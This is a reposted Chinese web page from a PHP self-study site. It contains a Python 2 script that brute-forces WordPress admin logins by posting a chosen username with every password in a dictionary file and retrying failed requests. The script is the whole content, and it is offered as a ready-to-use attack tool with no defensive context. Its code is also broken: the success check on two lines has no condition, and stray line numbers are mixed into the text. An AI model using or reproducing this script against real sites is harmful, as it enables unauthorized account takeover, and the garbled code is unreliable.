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wordpress后台暴力破解(python) - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] #Coding = UTF-802 import urllib, time, sys0304 start = time.time()05 errors = []06 def exploit(url, name, dictionary):07 for line in open(dictionary):08 line = line.strip()0......

#Coding = UTF-8 
02 import urllib, time, sys 
04 start = time.time() 
05 errors = [] 
06 def exploit(url, name, dictionary): 
07     for line in open(dictionary): 
08         line = line.strip() 
09         try: 
10             data = urllib.urlencode({'log':name,'pwd':line,'redirect_to':''}) 
11             content = urllib.urlopen(url, data) 
12             if == '': 
13                 print "Password is : %s" % line 
14                 print time.time() - start 
15                 sys.exit() 
16             else:
17                 print "try %s failed" % line 
18         except IOError: 
19             errors.append(line) 
20             print "try %s occurs IOERROR, add to list and retry it later" % line 
22 if __name__ == "__main__": 
23     if len(sys.argv) < 4: 
24         print 'Usage: Url AdminName Dictionary'
25         sys.exit(1) 
26     exploit(sys.argv[1], sys.argv[2], sys.argv[3]) 
27     while errors: 
28         for i,line in enumerate(errors): 
29             try: 
30                 data = urllib.urlencode({'log':sys.argv[2],'pwd':line,'redirect_to':''}) 
31                 content = urllib.urlopen(sys.argv[1], data) 
32                 if == '': 
33                     print "Password is : %s" % line 
34                     print time.time() - start 
35                     sys.exit() 
36                 else: 
37                     print "try %s failed" % line 
38                     del errors[i] 
39             except IOError: 
40                 errors.append(line) 
41                 print "try %s occurs IOERROR, add to list and retry it later" % line 
42     print time.time() - start

摘自 yezi 's blog



